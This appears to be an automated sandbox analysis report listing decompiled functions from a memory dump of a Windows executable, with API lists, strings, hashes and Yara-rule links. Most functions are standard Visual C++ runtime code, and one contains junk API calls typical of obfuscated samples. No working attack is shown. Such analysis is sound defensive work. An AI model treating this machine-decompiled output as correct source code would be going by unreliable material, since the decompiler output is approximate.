Function 00424E60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00424E60(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x447b80; // 0x5c71e752
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4c5b80 = _t6;
				 *0x4c5b7c = _t20;
				 *0x4c5b78 = _t22;
				 *0x4c5b74 = _t19;
				 *0x4c5b70 = _t25;
				 *0x4c5b6c = _t24;
				 *0x4c5b98 = ss;
				 *0x4c5b8c = cs;
				 *0x4c5b68 = ds;
				 *0x4c5b64 = es;
				 *0x4c5b60 = fs;
				 *0x4c5b5c = gs;
				asm("pushfd");
				_pop( *0x4c5b90);
				 *0x4c5b84 =  *_t29;
				 *0x4c5b88 = _v0;
				 *0x4c5b94 =  &_a4;
				 *0x4c5ad0 = 0x10001;
				_t11 =  *0x4c5b88; // 0x0
				 *0x4c5a84 = _t11;
				 *0x4c5a78 = 0xc0000409;
				 *0x4c5a7c = 1;
				_t21 =  *0x447b80; // 0x5c71e752
				_v812 = _t21;
				_t23 =  *0x447b84; // 0xa38e18ad
				_v808 = _t23;
				 *0x4c5ac8 = IsDebuggerPresent();
				_push(1);
				E00428090(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter("xZL");
				if( *0x4c5ac8 == 0) {
					_push(1);
					E00428090(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00424e60
0x00424e60
0x00424e60
0x00424e60
0x00424e60
0x00424e60
0x00424e60
0x00424e66
0x00424e68
0x00424e68
0x0042d69b
0x0042d6a0
0x0042d6a6
0x0042d6ac
0x0042d6b2
0x0042d6b8
0x0042d6be
0x0042d6c5
0x0042d6cc
0x0042d6d3
0x0042d6da
0x0042d6e1
0x0042d6e8
0x0042d6e9
0x0042d6f2
0x0042d6fa
0x0042d702
0x0042d70d
0x0042d717
0x0042d71c
0x0042d721
0x0042d72b
0x0042d735
0x0042d73b
0x0042d741
0x0042d747
0x0042d753
0x0042d758
0x0042d75a
0x0042d764
0x0042d76f
0x0042d77c
0x0042d77e
0x0042d780
0x0042d785
0x0042d79d

APIs

IsDebuggerPresent.KERNEL32 ref: 0042D74D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D764
UnhandledExceptionFilter.KERNEL32(xZL), ref: 0042D76F
GetCurrentProcess.KERNEL32(C0000409), ref: 0042D78D
TerminateProcess.KERNEL32(00000000), ref: 0042D794

Strings

xZL, xrefs: 0042D76A

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: xZL
API String ID: 2579439406-2594003103
Opcode ID: 5f54561d1a19773134987b0f7fddf3e8af804ec8e6d9965b2a1cd027adb8f6a8
Instruction ID: 3b908a521aea7bd2461095ef4f06f1d6779a4d9b5966617b3dba63cda736b2dc
Opcode Fuzzy Hash: 5f54561d1a19773134987b0f7fddf3e8af804ec8e6d9965b2a1cd027adb8f6a8
Instruction Fuzzy Hash: 8821FCB8900B048FD3809F65FD84A487BB0BB58314F50017AE808973A0E77538C08B4D

Uniqueness

Uniqueness Score: -1.00%

Function 0042C6D0, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C6D0() {

				SetUnhandledExceptionFilter(E0042C660);
				return 0;
			}

0x0042c6da
0x0042c6e3

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002C660), ref: 0042C6DA

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9bca716565e5b9298d6377c4997fcd20772e602dd2144fb33acd9940a9adf1b5
Instruction ID: cfcd1d3e7738359ac36b4c24a5d6f867b57dcad4f4643fbe723e7b6312e8169f
Opcode Fuzzy Hash: 9bca716565e5b9298d6377c4997fcd20772e602dd2144fb33acd9940a9adf1b5
Instruction Fuzzy Hash: 44B0123124830C27430017F27C09C063E8CC5C4B303A10071F00CD1060D8659400849D

Uniqueness

Uniqueness Score: -1.00%

Function 00845BDC, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674902927.0000000000841000.00000040.00000001.sdmp, Offset: 00841000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: e27229d821c3f87d8b3df7ad4f1ff1ce9ac7b7a1da9c270e94730bb3679aa358
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 41118272340604AFD744DF99DCD1EA673EAFB89324B298055ED04CB316E675EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 00422EB0, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00422EB0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				char _v64;
				char _v84;
				char _v100;
				signed int _v101;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				signed int _v120;
				signed int _t50;
				intOrPtr _t62;
				void* _t69;
				intOrPtr _t77;
				void* _t78;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t110;
				void* _t112;

				_t108 = __esi;
				_t107 = __edi;
				_t78 = __ebx;
				_t50 =  *0x447b80; // 0x5c71e752
				_v12 = _t50 ^ _t109;
				L00422A80( &_v100, _a4);
				_v8 = 0;
				while(1) {
					_t7 =  &_a8; // 0x422e54
					if( *((intOrPtr*)( *_t7 + 0x10)) >= 0x10) {
						_v112 = 0x10;
					} else {
						_t9 =  &_a8; // 0x422e54
						_v112 =  *((intOrPtr*)( *_t9 + 0x10));
					}
					if(_v8 >= _v112) {
						break;
					}
					_t15 =  &_a8; // 0x422e54
					_v101 =  *((intOrPtr*)( *_t15 + _v8 + 0x20));
					if(E00422B90( &_v100) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(E00422B90( &_v100))) + 0xac)) <= 1) {
						_t62 = E0042A0D0(E00422B90( &_v100), _v101 & 0x000000ff, 0x157);
						_t112 = _t110 + 0xc;
						_v116 = _t62;
					} else {
						_t77 = E0042A180(_v101 & 0x000000ff, 0x157, E00422B90( &_v100));
						_t112 = _t110 + 0xc;
						_v116 = _t77;
					}
					if(_v116 == 0) {
						_v120 = 0x20;
					} else {
						_v120 = _v101 & 0x000000ff;
					}
					 *((char*)(_t109 + _v8 - 0x50)) = _v120;
					_v108 =  *((intOrPtr*)(L004279F0(_v120)));
					 *((intOrPtr*)(L004279F0(_v120))) = 0;
					_t91 = _t109 + _v8 * 3 - 0x3c;
					_t69 = E0042A020(_t109 + _v8 * 3 - 0x3c, _t109 + _v8 * 3 - 0x3c, 0x31 - _v8 * 3, "%.2X ", _v101 & 0x000000ff);
					_t110 = _t112 + 0x10;
					if(_t69 < 0) {
						E00423050( *((intOrPtr*)(L004279F0(_t91))), 0x16, 0x22, L"(*_errno())", L"_printMemBlockData", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x91c, 0);
						_t110 = _t110 + 0x20;
					}
					 *((intOrPtr*)(L004279F0(_t91))) = _v108;
					_v8 = _v8 + 1;
				}
				_t100 = _v8;
				 *((char*)(_t109 + _v8 - 0x50)) = 0;
				_push( &_v64);
				if(L00427C10(0, 0, 0, 0, " Data: <%s> %s\n",  &_v84) == 1) {
					asm("int3");
				}
				return E00424E60(E00422B60( &_v100), _t78, _v12 ^ _t109, _t100, _t107, _t108);
			}

0x00422eb0
0x00422eb0
0x00422eb0
0x00422eb8
0x00422ebf
0x00422ec9
0x00422ece
0x00422ee0
0x00422ee0
0x00422ee7
0x00422ef4
0x00422ee9
0x00422ee9
0x00422eef
0x00422eef
0x00422f01
0x00000000
0x00000000
0x00422f07
0x00422f10
0x00422f1d
0x00422f65
0x00422f6a
0x00422f6d
0x00422f32
0x00422f45
0x00422f4a
0x00422f4d
0x00422f4d
0x00422f74
0x00422f7f
0x00422f76
0x00422f7a
0x00422f7a
0x00422f8c
0x00422f97
0x00422f9f
0x00422fc3
0x00422fc8
0x00422fcd
0x00422fd2
0x00422ff6
0x00422ffb
0x00422ffb
0x00423006
0x00422edd
0x00422edd
0x0042300d
0x00423010
0x00423018
0x00423035
0x00423037
0x00423037
0x0042304d

APIs

__isctype_l.LIBCMTD ref: 00422F45
__chvalidator_l.LIBCMTD ref: 00422F65

Part of subcall function 0042A0D0: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042A13F

_swprintf_s.LIBCMTD ref: 00422FC8
__invoke_watson_if_oneof.LIBCMTD ref: 00422FF6
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042303B

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00422FDB
, xrefs: 00422F7F
%.2X , xrefs: 00422FAA
T.B, xrefs: 00422EE0, 00422F07, 00422EE9
(*_errno()), xrefs: 00422FE5
_printMemBlockData, xrefs: 00422FE0
Data: <%s> %s, xrefs: 0042301D

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$UpdateUpdate::~_$__chvalidator_l__invoke_watson_if_oneof__isctype_l_swprintf_s
String ID: $ Data: <%s> %s$%.2X $(*_errno())$T.B$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
API String ID: 2593626323-497516267
Opcode ID: b9eca4081e30fb75b81afdfb5b0b5cd1a1696aac61e384271642e6e8be7769bd
Instruction ID: fab5e533b8d918e9121109e9b8c007d35fe4ece89f620fb94ad55a4ff667cd66
Opcode Fuzzy Hash: b9eca4081e30fb75b81afdfb5b0b5cd1a1696aac61e384271642e6e8be7769bd
Instruction Fuzzy Hash: 4E410470B04368ABDB04DFA5DE46BAEBB75BF50304F60016AE4056F2C2D7B89A04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA75, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041DA75(void* __eflags) {
				intOrPtr _t40;
				intOrPtr _t43;
				void* _t45;

				E004235C8(0x43d5be, _t45);
				E0041E5E0(_t45 - 0x14, 0);
				_t43 =  *0x4c4eac;
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				 *((intOrPtr*)(_t45 - 0x10)) = _t43;
				_t40 = E0041A5D0( *((intOrPtr*)(_t45 + 8)), E0041A500(0x4c4f24));
				if(_t40 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t45 + 8)));
						_push(_t45 - 0x10);
						if(E0041D8AF() == 0xffffffff) {
							E00420860(_t45 - 0x20, "bad cast");
							E00423690(_t45 - 0x20, 0x43e154);
						}
						_t40 =  *((intOrPtr*)(_t45 - 0x10));
						 *0x4c4eac = _t40;
						E0041A535(_t40);
						E0041E650(_t40);
					} else {
						_t40 = _t43;
					}
				}
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				E0041E620(_t45 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t40;
			}

0x0041da7a
0x0041da89
0x0041da8e
0x0041da94
0x0041da9d
0x0041daae
0x0041dab2
0x0041dab6
0x0041dabc
0x0041dac2
0x0041dacd
0x0041dad7
0x0041dae5
0x0041dae5
0x0041daea
0x0041daef
0x0041daf5
0x0041dafb
0x0041dab8
0x0041dab8
0x0041dab8
0x0041dab6
0x0041db01
0x0041db08
0x0041db14
0x0041db1c

APIs

__EH_prolog.LIBCMT ref: 0041DA7A
std::_Lockit::_Lockit.LIBCPMTD ref: 0041DA89
int.LIBCPMT ref: 0041DAA0

Part of subcall function 0041A500: std::_Lockit::_Lockit.LIBCPMTD ref: 0041A511
Part of subcall function 0041A500: std::_Lockit::~_Lockit.LIBCPMTD ref: 0041A52B

std::locale::_Getfacet.LIBCPMT ref: 0041DAA9
std::bad_exception::bad_exception.LIBCMTD ref: 0041DAD7
__CxxThrowException@8.LIBCMTD ref: 0041DAE5
std::locale::facet::_Incref.LIBCPMT ref: 0041DAF5
std::locale::facet::_Facet_Register.LIBCPMTD ref: 0041DAFB
std::_Lockit::~_Lockit.LIBCPMTD ref: 0041DB08

Strings

$OL, xrefs: 0041DA98
bad cast, xrefs: 0041DACF

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::facet::_$Exception@8Facet_GetfacetH_prologIncrefRegisterThrowstd::bad_exception::bad_exceptionstd::locale::_
String ID: $OL$bad cast
API String ID: 2482789966-2694716277
Opcode ID: 1127feddd3b68cacb595e336ea5c222978df16e868fe49697cc8603b534441e3
Instruction ID: abf51a13210af99d08a3fe1f632106b151702bd14d9c1848f8ef84816c85c834
Opcode Fuzzy Hash: 1127feddd3b68cacb595e336ea5c222978df16e868fe49697cc8603b534441e3
Instruction Fuzzy Hash: 9A11A372E00114ABCB04EBA2D812AEF7775AF90768F50052FF412A72D1DB7C9A45C79D

Uniqueness

Uniqueness Score: -1.00%

Function 00426450, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426450(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t24;
				void* _t27;
				void* _t32;

				_v12 = L00429D20(_t27);
				if(_v12 != 0) {
					if( *((intOrPtr*)(_v12 + 0x24)) != 0) {
						L5:
						_v8 =  *((intOrPtr*)(_v12 + 0x24));
						E004255F0(E00426E40( *((intOrPtr*)(_v12 + 0x24)), _v8, 0x86, E00426500( *((intOrPtr*)(_v12 + 0x24)), _a4)), _t21, L"strcpy_s(errmsg, (94+38+2), _get_sys_err_msg(errnum))", L"strerror", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\strerror.c", 0x53, 0);
						return _v8;
					}
					_t24 = L00421380(0x86, 1, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\strerror.c", 0x4a);
					_t32 = _t32 + 0x14;
					_v16 = _t24;
					 *((intOrPtr*)(_v12 + 0x24)) = _v16;
					if(_v16 != 0) {
						goto L5;
					}
					return "Visual C++ CRT: Not enough memory to complete call to strerror.";
				}
				return "Visual C++ CRT: Not enough memory to complete call to strerror.";
			}

0x0042645d
0x00426464
0x00426477
0x004264ac
0x004264b2
0x004264e7
0x00000000
0x004264ef
0x00426489
0x0042648e
0x00426491
0x0042649a
0x004264a1
0x00000000
0x00000000
0x00000000
0x004264a3
0x00000000

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c, xrefs: 0042647B
Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00426466, 004264A3
strcpy_s(errmsg, (94+38+2), _get_sys_err_msg(errnum)), xrefs: 004264C3
strerror, xrefs: 004264BE
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c, xrefs: 004264B9

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.$f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c$f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c$strcpy_s(errmsg, (94+38+2), _get_sys_err_msg(errnum))$strerror
API String ID: 0-3761290748
Opcode ID: e96130c8846a0781df89daf5010f2f2d0c59a9ec12bd6a5ed0f9413dc9002186
Instruction ID: 43f11fe602b949f065902dba7a712a2805535a08a364f853f3e8c8affef2f2c1
Opcode Fuzzy Hash: e96130c8846a0781df89daf5010f2f2d0c59a9ec12bd6a5ed0f9413dc9002186
Instruction Fuzzy Hash: 87118AB4F40314BBDB00EB94E942F5E7774AB54704F51416AB944773C2D6799E408B4D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9AC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 26
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0041C9AC(void* __eax, void* __edx) {
				void* _t17;

				asm("adc [eax], eax");
				 *((intOrPtr*)(_t17 + 0x4e)) =  *((intOrPtr*)(_t17 + 0x4e)) + __edx;
				__imp__CreateActCtxA(_t17 - 0x1b1c);
				DeleteFileW(L"Gibimayumulega pof pewoxofoyo");
				InterlockedExchange(_t17 - 0x1afc, 0);
				GetCommandLineW();
				MoveFileA(_t17 - 0x1af8, 0);
				TlsSetValue(0, 0);
				Sleep(0);
				return 0;
			}

0x0041c9b2
0x0041c9b4
0x0041c9be
0x0041c9c9
0x0041c9d8
0x0041c9de
0x0041c9ed
0x0041c9f7
0x0041c9ff
0x0041ca08

APIs

CreateActCtxA.KERNEL32 ref: 0041C9BE
DeleteFileW.KERNEL32(Gibimayumulega pof pewoxofoyo), ref: 0041C9C9
InterlockedExchange.KERNEL32(?,00000000), ref: 0041C9D8
GetCommandLineW.KERNEL32 ref: 0041C9DE
MoveFileA.KERNEL32(?,00000000), ref: 0041C9ED
TlsSetValue.KERNEL32(00000000,00000000), ref: 0041C9F7
Sleep.KERNEL32(00000000), ref: 0041C9FF

Strings

Gibimayumulega pof pewoxofoyo, xrefs: 0041C9C4

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CommandCreateDeleteExchangeInterlockedLineMoveSleepValue
String ID: Gibimayumulega pof pewoxofoyo
API String ID: 1728549717-799732446
Opcode ID: e9ac4547b0ddb2cb8334ac35d1bbe8234dadfed4570da50d784fce1d5051f08a
Instruction ID: be774dd89a9a4a9af3cbc0b0abe74aa02855184445f693d1d15d61f5049e5025
Opcode Fuzzy Hash: e9ac4547b0ddb2cb8334ac35d1bbe8234dadfed4570da50d784fce1d5051f08a
Instruction Fuzzy Hash: 15F01C32A44245ABDB509BF0AE0DFC93BA8BB09702F514075F386E54F0DBB485818B29

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7C8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D7C8(intOrPtr __ecx) {
				intOrPtr _t38;
				void* _t40;

				E004235C8(0x43d589, _t40);
				_t38 = __ecx;
				 *((intOrPtr*)(_t40 - 0x10)) = __ecx;
				E0041E5E0(__ecx, 0);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((char*)(__ecx + 0x20)) = 0;
				 *((char*)(_t40 - 4)) = 4;
				if( *(_t40 + 8) == 0) {
					 *(_t40 + 8) = "bad locale name";
					E00420660(_t40 - 0x1c, _t40 + 8);
					 *((intOrPtr*)(_t40 - 0x1c)) = 0x40194c;
					E00423690(_t40 - 0x1c, 0x43e0c0);
				}
				E0041EB30(_t38,  *(_t40 + 8));
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				return _t38;
			}

0x0041d7cd
0x0041d7d7
0x0041d7dc
0x0041d7df
0x0041d7e4
0x0041d7e7
0x0041d7ea
0x0041d7ed
0x0041d7f0
0x0041d7f3
0x0041d7f6
0x0041d7f9
0x0041d7fc
0x0041d7ff
0x0041d806
0x0041d80f
0x0041d816
0x0041d824
0x0041d82b
0x0041d82b
0x0041d834
0x0041d842
0x0041d84a

APIs

__EH_prolog.LIBCMT ref: 0041D7CD
std::_Lockit::_Lockit.LIBCPMTD ref: 0041D7DF
std::exception::exception.LIBCMTD ref: 0041D816

Part of subcall function 00420660: std::exception::_Copy_str.LIBCMTD ref: 0042068C

__CxxThrowException@8.LIBCMTD ref: 0041D82B

Part of subcall function 00423690: RaiseException.KERNEL32(?,?,0041D1CD,00000000,?,?,?,?,?,?,0041D1CD), ref: 004236DC

std::_Locinfo::_Locinfo_ctor.LIBCPMTD ref: 0041D834

Strings

bad locale name, xrefs: 0041D80F

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: 3a09f2e13c2a404ca7941e37d0d0e15c1440e2be8b9780cd6b732e9bd9790a48
Instruction ID: 280471332fa5d06ef8d52f53a045e0cbd38c3464ddc8db9ec2afb0c6f3b54bb6
Opcode Fuzzy Hash: 3a09f2e13c2a404ca7941e37d0d0e15c1440e2be8b9780cd6b732e9bd9790a48
Instruction Fuzzy Hash: 18015EB2901754AEC711DF9A90819CAFBB4AF18348B40892FE55993641C778A648CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041D34A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041D34A(void* __ecx, signed int _a4, char* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				signed int _t19;
				char* _t20;
				signed char _t29;
				intOrPtr _t30;

				_t19 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t19;
				_t29 =  *(__ecx + 0x10) & _t19;
				if(_t29 == 0) {
					return _t19;
				}
				_t20 = 0;
				if(_a8 == 0) {
					L4:
					if((_t29 & 0x00000004) == 0) {
						if((_t29 & 0x00000002) == 0) {
							_t30 = E0041EF10();
							_a8 = "ios_base::eofbit set";
						} else {
							_t30 = E0041EF10();
							_a8 = "ios_base::failbit set";
						}
					} else {
						_t30 = E0041EF10();
						_a8 = "ios_base::badbit set";
					}
					_t29 =  &_v24;
					E00420660(_t29,  &_a8);
					_v12 = 1;
					_v8 = _t30;
					_v24 = 0x401a18;
					_push(0x43e01c);
					_t20 =  &_v24;
					L3:
					_push(_t20);
					E00423690();
					goto L4;
				}
				_push(0);
				goto L3;
			}

0x0041d350
0x0041d353
0x0041d35c
0x0041d35e
0x0041d3cd
0x0041d3cd
0x0041d360
0x0041d365
0x0041d36e
0x0041d374
0x0041d3aa
0x0041d3c1
0x0041d3c3
0x0041d3ac
0x0041d3b1
0x0041d3b3
0x0041d3b3
0x0041d376
0x0041d37b
0x0041d37d
0x0041d37d
0x0041d388
0x0041d38b
0x0041d390
0x0041d393
0x0041d396
0x0041d39d
0x0041d3a2
0x0041d368
0x0041d368
0x0041d369
0x00000000
0x0041d369
0x0041d367
0x00000000

APIs

__CxxThrowException@8.LIBCMTD ref: 0041D369
std::exception::exception.LIBCMTD ref: 0041D38B

Strings

ios_base::badbit set, xrefs: 0041D37D
ios_base::failbit set, xrefs: 0041D3B3
ios_base::eofbit set, xrefs: 0041D3C3

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 737250d408467d26b0c0d7bb90e4a7e50f2b8d24d0579217709d9b64a79ef46c
Instruction ID: cb7c81a3b656af127ca7d4c5e6a829835eec5d31bd8b1eeca5cd4ce151645d74
Opcode Fuzzy Hash: 737250d408467d26b0c0d7bb90e4a7e50f2b8d24d0579217709d9b64a79ef46c
Instruction Fuzzy Hash: 1C0152B1A0120CABC704EF6985066EE77E46B04358F54C42BFC15AB242D77DCA458F6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D518, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041D518(intOrPtr __ecx) {
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t23;

				E004235C8(0x43d54b, _t23);
				_push(__ecx);
				_t21 = __ecx;
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x401b04;
				E00420220(__ecx + 4);
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				if(E0041EE30(4, E0041EF00(), "C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\streambuf", 0x18) == 0) {
					_t12 = 0;
				} else {
					_t12 = E0041A5B6(_t11);
				}
				 *((intOrPtr*)(_t21 + 0x38)) = _t12;
				E0041D12C(_t21);
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t21;
			}

0x0041d51d
0x0041d522
0x0041d524
0x0041d529
0x0041d52c
0x0041d532
0x0041d537
0x0041d554
0x0041d55f
0x0041d556
0x0041d558
0x0041d558
0x0041d563
0x0041d566
0x0041d571
0x0041d579

APIs

__EH_prolog.LIBCMT ref: 0041D51D
std::_Mutex::_Mutex.LIBCPMTD ref: 0041D532

Part of subcall function 00420220: new.LIBCPMTD ref: 0042023A

new.LIBCPMTD ref: 0041D54A

Part of subcall function 0041EE30: std::bad_alloc::bad_alloc.LIBCMTD ref: 0041EE78
Part of subcall function 0041EE30: _atexit.LIBCMTD ref: 0041EE82
Part of subcall function 0041EE30: __CxxThrowException@8.LIBCMTD ref: 0041EEA0

std::locale::locale.LIBCPMT ref: 0041D558

Part of subcall function 0041A5B6: std::locale::_Init.LIBCPMTD ref: 0041A5B9
Part of subcall function 0041A5B6: std::locale::facet::_Incref.LIBCPMT ref: 0041A5C7

Strings

C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf, xrefs: 0041D53D

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
